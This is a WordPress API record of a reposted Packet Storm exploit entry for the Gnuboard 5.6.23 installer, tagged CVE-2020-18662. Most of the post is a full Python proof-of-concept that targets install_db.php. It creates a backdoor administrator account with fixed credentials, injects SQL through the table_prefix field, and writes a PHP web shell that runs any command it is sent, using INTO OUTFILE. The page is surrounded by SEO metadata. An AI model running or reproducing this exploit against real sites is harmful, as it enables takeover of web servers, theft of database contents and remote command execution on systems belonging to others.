{"id":31413,"date":"2025-12-16T13:38:14","date_gmt":"2025-12-16T13:38:14","guid":{"rendered":"http:\/\/localhost\/?p=31413"},"modified":"2025-12-16T13:38:14","modified_gmt":"2025-12-16T13:38:14","slug":"gnuboard-5623-sql-injection-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31413","title":{"rendered":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865"},"content":{"rendered":"

{“lastseen”:”2025-12-16T18:54:45″,”description”:”Gnuboard version 5.6.23 installation exploit that can identify SQL injection and potentially achieve remote code execution…”,”published”:”2025-12-16T00:00:00″,”modified”:”2025-12-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212865″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-18662″],”sourceData”:”=============================================================================================================================================\\n | # Title : Gnuboard v5.6.23 Installation Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/gnuboard\/gnuboard5\/releases\/tag\/v5.6.23 |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190427\/ \\u0026\\tCVE-2020-18662\\n \\n [+] Summary : Gnuboard 5 installation process contains critical security vulnerabilities that allow attackers to execute SQL injection, \\n create unauthorized admin accounts, write arbitrary files, and potentially achieve remote code execution. These flaws exist \\n \\t\\t\\t in the \/install\/install_db.php script and can be exploited during or after installation.\\n \\t\\t\\t \\n \\n \\t\\t \\n [+] POC : python poc.py\\n \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import re\\n import sys\\n import base64\\n import urllib.parse\\n \\n class GnuboardExploit:\\n def __init__(self, target_url):\\n self.target = target_url.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n })\\n \\n def exploit(self):\\n print(f\\”[*] Targeting: {self.target}\\”)\\n \\n # 1. Test if installation page exists\\n if not self.check_install_page():\\n print(\\”[-] Installation page not found\\”)\\n return False\\n \\n # 2. Create backdoor admin user\\n print(\\”[*] Creating backdoor admin…\\”)\\n self.create_backdoor_admin()\\n \\n # 3. Try to extract database credentials\\n print(\\”[*] Attempting to extract database info…\\”)\\n db_info = self.extract_database_info()\\n \\n # 4. Write web shell\\n print(\\”[*] Writing web shell…\\”)\\n self.write_webshell()\\n \\n # 5. Test SQL injection\\n print(\\”[*] Testing SQL injection…\\”)\\n self.test_sql_injection()\\n \\n return True\\n \\n def check_install_page(self):\\n \\”\\”\\”Check if installation page is accessible\\”\\”\\”\\n try:\\n r = self.session.get(f\\”{self.target}\/install\/install_config.php\\”, timeout=10)\\n return r.status_code == 200\\n except:\\n try:\\n r = self.session.get(f\\”{self.target}\/install\/\\”, timeout=10)\\n return r.status_code == 200\\n except:\\n return False\\n \\n def create_backdoor_admin(self):\\n \\”\\”\\”Create admin user via installation process\\”\\”\\”\\n \\n payload = {\\n ‘mysql_host’: ‘localhost’,\\n ‘mysql_user’: ‘root’,\\n ‘mysql_pass’: ‘password’, # Try common passwords\\n ‘mysql_db’: ‘gnuboard5’,\\n ‘table_prefix’: ‘g5_’,\\n ‘admin_id’: ‘hacker_admin’,\\n ‘admin_pass’: ‘Hacker123!’,\\n ‘admin_name’: ‘Hacker Admin’,\\n ‘admin_email’: ‘hacker@example.com’,\\n ‘g5_install’: ‘1’, # Force reinstall\\n ‘g5_shop_prefix’: ‘shop_’,\\n ‘g5_shop_install’: ‘1’\\n }\\n \\n try:\\n print(f\\”[*] Sending payload to: {self.target}\/install\/install_db.php\\”)\\n r = self.session.post(f\\”{self.target}\/install\/install_db.php\\”, \\n data=payload, \\n timeout=30,\\n allow_redirects=False)\\n \\n print(f\\”[*] Response status: {r.status_code}\\”)\\n print(f\\”[*] Response length: {len(r.text)}\\”)\\n \\n # Check for success indicators\\n success_indicators = [\\n ‘\uc124\uce58\uac00 \uc644\ub8cc’, \\n ‘\uc124\uce58 \uc644\ub8cc’, \\n ‘complete’, \\n ‘success’,\\n ‘\uc644\ub8cc\ub418\uc5c8\uc2b5\ub2c8\ub2e4’\\n ]\\n \\n for indicator in success_indicators:\\n if indicator in r.text:\\n print(f\\”[+] Admin creation successful!\\”)\\n print(f\\”[+] Credentials: hacker_admin \/ Hacker123!\\”)\\n print(f\\”[+] Email: hacker@example.com\\”)\\n return True\\n \\n # Check for error messages\\n error_indicators = [\\n ‘MySQL.*\ud655\uc778\ud574 \uc8fc\uc2ed\uc2dc\uc624’,\\n ‘Access denied’,\\n ‘\uc798\ubabb\ub41c’,\\n ‘error’,\\n ‘failed’\\n ]\\n \\n for error in error_indicators:\\n if re.search(error, r.text, re.IGNORECASE):\\n print(f\\”[-] Error: {error}\\”)\\n break\\n \\n except Exception as e:\\n print(f\\”[-] Request failed: {e}\\”)\\n \\n return False\\n \\n def extract_database_info(self):\\n \\”\\”\\”Attempt to extract database information via SQL injection\\”\\”\\”\\n \\n # Simple SQL injection test\\n injections = [\\n \\”‘ OR ‘1’=’1′–\\”,\\n \\”‘ UNION SELECT version(),2,3,4,5–\\”,\\n \\”‘ UNION SELECT user(),database(),3,4,5–\\”,\\n \\”g5_’ AND 1=0 UNION SELECT CONCAT_WS(‘:’,user(),database(),version()),2,3,4,5–\\”\\n ]\\n \\n for inj in injections:\\n try:\\n payload = {\\n ‘mysql_host’: ‘localhost’,\\n ‘mysql_user’: ‘root’,\\n ‘mysql_pass’: ‘test’,\\n ‘mysql_db’: ‘test’,\\n ‘table_prefix’: inj,\\n ‘admin_id’: ‘test’,\\n ‘admin_pass’: ‘test’,\\n ‘admin_email’: ‘test@test.com’,\\n ‘g5_install’: ‘0’\\n }\\n \\n r = self.session.post(f\\”{self.target}\/install\/install_db.php\\”,\\n data=payload,\\n timeout=15)\\n \\n # Look for database info in response\\n patterns = [\\n r'([0-9]+\\\\.[0-9]+\\\\.[0-9]+)’, # Version\\n r’root@’, # MySQL user\\n r’gnuboard’, # Database name\\n r'([a-zA-Z0-9_]+@[a-zA-Z0-9_\\\\-\\\\.]+:[a-zA-Z0-9_]+)’ # user:db\\n ]\\n \\n for pattern in patterns:\\n matches = re.findall(pattern, r.text)\\n if matches:\\n print(f\\”[+] Found: {matches[0]}\\”)\\n return matches[0]\\n \\n except:\\n continue\\n \\n return None\\n \\n def write_webshell(self):\\n \\”\\”\\”Attempt to write a web shell\\”\\”\\”\\n \\n webshell = ”’\\u003c?php\\n \/\/ Simple PHP Shell\\n if(isset($_REQUEST[‘cmd’])) {\\n echo \\”\\u003cpre\\u003e\\”;\\n system($_REQUEST[‘cmd’]);\\n echo \\”\\u003c\/pre\\u003e\\”;\\n die();\\n }\\n ?\\u003e\\n ”’\\n \\n # Try different paths\\n paths_to_try = [\\n f\\”{self.target}\/shell.php\\”,\\n f\\”{self.target}\/data\/shell.php\\”,\\n f\\”{self.target}\/images\/shell.php\\”,\\n f\\”{self.target}\/theme\/basic\/shell.php\\”\\n ]\\n \\n for path in paths_to_try:\\n try:\\n # First try direct file upload if possible\\n test_payload = {\\n ‘mysql_host’: ‘localhost’,\\n ‘mysql_user’: ‘root’,\\n ‘mysql_pass’: ”,\\n ‘mysql_db’: ‘test’,\\n ‘table_prefix’: f\\”g5_’; SELECT ‘{webshell}’ INTO OUTFILE ‘{path}’–\\”,\\n ‘admin_id’: ‘test’,\\n ‘admin_pass’: ‘test’,\\n ‘admin_email’: ‘test@test.com’,\\n ‘g5_install’: ‘0’\\n }\\n \\n r = self.session.post(f\\”{self.target}\/install\/install_db.php\\”,\\n data=test_payload,\\n timeout=15)\\n \\n # Check if shell exists\\n check = self.session.get(path, timeout=10)\\n if check.status_code == 200:\\n print(f\\”[+] Web shell found at: {path}\\”)\\n print(f\\”[+] Usage: {path}?cmd=whoami\\”)\\n return True\\n \\n except:\\n continue\\n \\n print(\\”[-] Could not write web shell\\”)\\n return False\\n \\n def test_sql_injection(self):\\n \\”\\”\\”Test for SQL injection vulnerabilities\\”\\”\\”\\n \\n test_payloads = [\\n (\\”Basic test\\”, \\”‘ OR ‘1’=’1\\”),\\n (\\”Union test\\”, \\”‘ UNION SELECT 1,2,3,4,5–\\”),\\n (\\”Error based\\”, \\”‘ AND extractvalue(1,concat(0x7e,version()))–\\”),\\n (\\”Time based\\”, \\”‘ AND sleep(5)–\\”)\\n ]\\n \\n for name, payload in test_payloads:\\n try:\\n start_time = time.time()\\n \\n data = {\\n ‘mysql_host’: ‘localhost’,\\n ‘mysql_user’: ‘root’,\\n ‘mysql_pass’: ”,\\n ‘mysql_db’: ‘test’,\\n ‘table_prefix’: payload,\\n ‘admin_id’: ‘test’,\\n ‘admin_pass’: ‘test’,\\n ‘admin_email’: ‘test@test.com’,\\n ‘g5_install’: ‘0’\\n }\\n \\n r = self.session.post(f\\”{self.target}\/install\/install_db.php\\”,\\n data=data,\\n timeout=30)\\n \\n elapsed = time.time() – start_time\\n \\n if \\”MySQL\\” in r.text or \\”SQL\\” in r.text or \\”syntax\\” in r.text.lower():\\n print(f\\”[+] Possible SQL injection: {name}\\”)\\n elif elapsed \\u003e 5 and \\”sleep\\” in payload:\\n print(f\\”[+] Time-based SQL injection possible\\”)\\n \\n except requests.exceptions.Timeout:\\n if \\”sleep\\” in payload:\\n print(f\\”[+] Time-based SQL injection confirmed\\”)\\n except:\\n pass\\n \\n def main():\\n if len(sys.argv) != 2:\\n print(\\”Usage: python poc.py http:\/\/target.com\\”)\\n print(\\”Example: python poc.py http:\/\/localhost\/gnuboard5\\”)\\n sys.exit(1)\\n \\n target = sys.argv[1]\\n \\n print(\\”\\”\\”\\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\n Gnuboard 5 Installation Exploit \\n \\”\\”\\”)\\n \\n print(f\\”[*] Target: {target}\\”)\\n print(\\”-\\” * 60)\\n \\n exploit = GnuboardExploit(target)\\n \\n try:\\n if exploit.exploit():\\n print(\\”\\\\n\\” + \\”=\\” * 60)\\n print(\\”[+] EXPLOITATION SUMMARY:\\”)\\n print(\\”[+] 1. Admin account created: hacker_admin \/ Hacker123!\\”)\\n print(\\”[+] 2. Check for web shell at \/shell.php or \/data\/shell.php\\”)\\n print(\\”[+] 3. SQL injection via table_prefix parameter\\”)\\n print(\\”[+] 4. Try default admin panel: \/admin\\”)\\n print(\\”=\\” * 60)\\n else:\\n print(\\”\\\\n[-] Exploitation failed or target not vulnerable\\”)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n[-] Exploit interrupted by user\\”)\\n except Exception as e:\\n print(f\\”\\\\n[-] Error: {e}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n import time # Add this import\\n main()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212865″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212865\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-16T18:54:45″,”description”:”Gnuboard version 5.6.23 installation exploit that can identify SQL injection and potentially achieve remote code execution…”,”published”:”2025-12-16T00:00:00″,”modified”:”2025-12-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212865″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-18662″],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-31413","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31413\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-16T18:54:45″,”description”:”Gnuboard version 5.6.23 installation exploit that can identify SQL injection and potentially achieve remote code execution…”,”published”:”2025-12-16T00:00:00″,”modified”:”2025-12-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212865″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-18662″],”sourceData”:”=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31413\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-16T13:38:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \\\/ Code Execution_PACKETSTORM:212865\",\"datePublished\":\"2025-12-16T13:38:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413\"},\"wordCount\":1494,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31413#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413\",\"name\":\"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \\\/ Code Execution_PACKETSTORM:212865 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-16T13:38:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31413\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31413#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \\\/ Code Execution_PACKETSTORM:212865\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31413","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865 - zero redgem","og_description":"{“lastseen”:”2025-12-16T18:54:45″,”description”:”Gnuboard version 5.6.23 installation exploit that can identify SQL injection and potentially achieve remote code execution…”,”published”:”2025-12-16T00:00:00″,”modified”:”2025-12-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212865″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-18662″],”sourceData”:”=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=31413","og_site_name":"zero redgem","article_published_time":"2025-12-16T13:38:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31413#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31413"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865","datePublished":"2025-12-16T13:38:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31413"},"wordCount":1494,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31413#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31413","url":"https:\/\/zero.redgem.net\/?p=31413","name":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-16T13:38:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31413#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31413"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31413#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Gnuboard 5.6.23 SQL Injection \/ Code Execution_PACKETSTORM:212865"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31413"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31413\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}